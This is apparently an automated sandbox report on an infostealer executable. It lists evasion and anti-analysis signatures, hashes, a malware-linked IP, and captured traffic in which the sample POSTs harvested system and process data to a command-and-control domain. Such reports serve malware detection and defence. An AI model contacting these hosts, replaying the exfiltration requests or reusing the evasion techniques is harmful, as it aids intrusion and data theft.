Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
E6rBvcWFWu.exe

Overview

General Information

Sample name:E6rBvcWFWu.exe
renamed because original name is a hash value
Original sample name:b6bf5fb735bf9b5b70a90d2c7eeb2996.exe
Analysis ID:1580905
MD5:b6bf5fb735bf9b5b70a90d2c7eeb2996
SHA1:e558c73bd203dc9db3f548b9631715d281d5fc2e
SHA256:cba47d50bdd548bb66bcb87510fdcc8893e53d4077fa626a0c29d83536439b6f
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • E6rBvcWFWu.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\E6rBvcWFWu.exe" MD5: B6BF5FB735BF9B5B70A90D2C7EEB2996)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: E6rBvcWFWu.exeAvira: detected
Antivirus detection for URL or domain
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3Avira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0Avira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0UAvira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwYAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: E6rBvcWFWu.exeVirustotal: Detection: 65%Perma Link
Source: E6rBvcWFWu.exeReversingLabs: Detection: 71%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: E6rBvcWFWu.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0069DCF0
Source: E6rBvcWFWu.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_006DA5B0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_006DA7F0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_006DA7F0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_006DA7F0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_006DA7F0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_006DA7F0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_006DA7F0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_006DB560
Source: E6rBvcWFWu.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0067255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0067255D
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_006729FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 501311Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 35 32 31 34 35 34 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=0 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0073A8C0 recvfrom,0_2_0073A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=0 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20ht.top
Source: unknownHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 501311Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 35 32 31 34 35 34 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Thu, 26 Dec 2024 12:02:33 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Thu, 26 Dec 2024 12:02:35 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: E6rBvcWFWu.exe, 00000000.00000003.1515970182.0000000001A73000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
Source: E6rBvcWFWu.exe, 00000000.00000002.1555959761.0000000001A7A000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1516018473.0000000001A78000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1515970182.0000000001A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3
Source: E6rBvcWFWu.exe, 00000000.00000003.1515251616.0000000001A84000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1556041861.0000000001A85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0
Source: E6rBvcWFWu.exe, 00000000.00000003.1515251616.0000000001A84000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1556041861.0000000001A85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0U
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: E6rBvcWFWu.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: E6rBvcWFWu.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: E6rBvcWFWu.exe, E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: E6rBvcWFWu.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719

System Summary

barindex
PE file contains section with special chars
Source: E6rBvcWFWu.exeStatic PE information: section name:
Source: E6rBvcWFWu.exeStatic PE information: section name: .idata
Source: E6rBvcWFWu.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE85D10_3_01AE85D1
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01ADA4A10_3_01ADA4A1
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE5A8B0_3_01AE5A8B
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE85D10_3_01AE85D1
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01ADA4A10_3_01ADA4A1
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE5A8B0_3_01AE5A8B
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006805B00_2_006805B0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_00686FA00_2_00686FA0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006AF1000_2_006AF100
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0073B1800_2_0073B180
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_007400E00_2_007400E0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009FE0300_2_009FE030
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006D62100_2_006D6210
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0073C3200_2_0073C320
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_007404200_2_00740420
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009C44100_2_009C4410
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0067E6200_2_0067E620
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0073C7700_2_0073C770
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009F47800_2_009F4780
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006DA7F00_2_006DA7F0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009D67300_2_009D6730
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0067A9600_2_0067A960
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006849400_2_00684940
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0072C9000_2_0072C900
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_00846AC00_2_00846AC0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0092AAC00_2_0092AAC0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009E8BF00_2_009E8BF0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0092AB2C0_2_0092AB2C
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0067CBB00_2_0067CBB0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_00804B600_2_00804B60
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009FCC700_2_009FCC70
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_00830D800_2_00830D80
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009ECD800_2_009ECD80
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009F4D400_2_009F4D40
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0098AE300_2_0098AE30
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009C2F900_2_009C2F90
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_00694F700_2_00694F70
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0073EF900_2_0073EF90
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_00738F900_2_00738F90
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006810E60_2_006810E6
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009DD4300_2_009DD430
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009E35B00_2_009E35B0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009C56D00_2_009C56D0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_00A017800_2_00A01780
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_007298800_2_00729880
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009C99200_2_009C9920
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009F3A700_2_009F3A70
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009E1BD00_2_009E1BD0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006B1BE00_2_006B1BE0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_00929C800_2_00929C80
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009D7CC00_2_009D7CC0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_00685DB00_2_00685DB0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_00683ED00_2_00683ED0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_00695EB00_2_00695EB0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009F9FE00_2_009F9FE0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 006775A0 appears 702 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 0084CBC0 appears 104 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 006B4FD0 appears 290 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 006B4F40 appears 337 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 006B5340 appears 50 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 007544A0 appears 76 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 0068CCD0 appears 54 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 006773F0 appears 113 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 0067C960 appears 37 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 0067CAA0 appears 61 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 006771E0 appears 47 times
